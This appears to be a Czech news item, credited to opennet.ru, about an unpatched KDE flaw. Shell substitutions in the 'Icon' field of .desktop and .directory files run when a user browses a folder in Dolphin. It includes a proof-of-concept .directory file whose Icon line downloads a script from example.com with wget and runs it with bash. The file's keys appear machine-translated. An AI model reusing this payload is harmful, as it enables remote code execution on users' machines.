V KDE , který umožňuje útočníkovi spouštět libovolné příkazy, když si uživatel prohlíží adresář nebo archiv obsahující speciálně navržené soubory „.desktop“ a „.directory“. Útok vyžaduje, aby si uživatel jednoduše prohlédl seznam souborů ve správci souborů Dolphin, stáhl si škodlivý soubor z plochy nebo přetáhl zástupce na plochu nebo do dokumentu. Problém se projevuje v aktuálním vydání knihoven a starší verze, až po KDE 4. Chyba zabezpečení stále trvá (CVE není přiděleno).
Problém je způsoben nesprávnou implementací třídy KDesktopFile, která při zpracování proměnné „Icon“ bez řádného escapování předá hodnotu funkci KConfigPrivate::expandString(), která provádí expanzi speciálních znaků shellu včetně zpracování řetězce „$(..)“ jako příkazy, které se mají provést. Na rozdíl od požadavků specifikace XDG implementace skořepinové konstrukce se vyrábějí bez oddělení typu nastavení, tzn. nejen při určování příkazového řádku aplikace, která se má spouštět, ale také při zadávání ikon zobrazených ve výchozím nastavení.
Například k útoku odešlete uživateli archiv zip s adresářem obsahujícím soubor „.directory“ takto:
[Vstup pro počítač]
Typ=Adresář
Ikona[$e]=$(wget${IFS}https://example.com/NÁZEV SOUBORU.sh&&/bin/bash${IFS}NÁZEV SOUBORU.sh)
Při pokusu o zobrazení obsahu archivu ve správci souborů Dolphin se stáhne a spustí skript https://example.com/NÁZEV SOUBORU.sh.
Zdroj: opennet.ru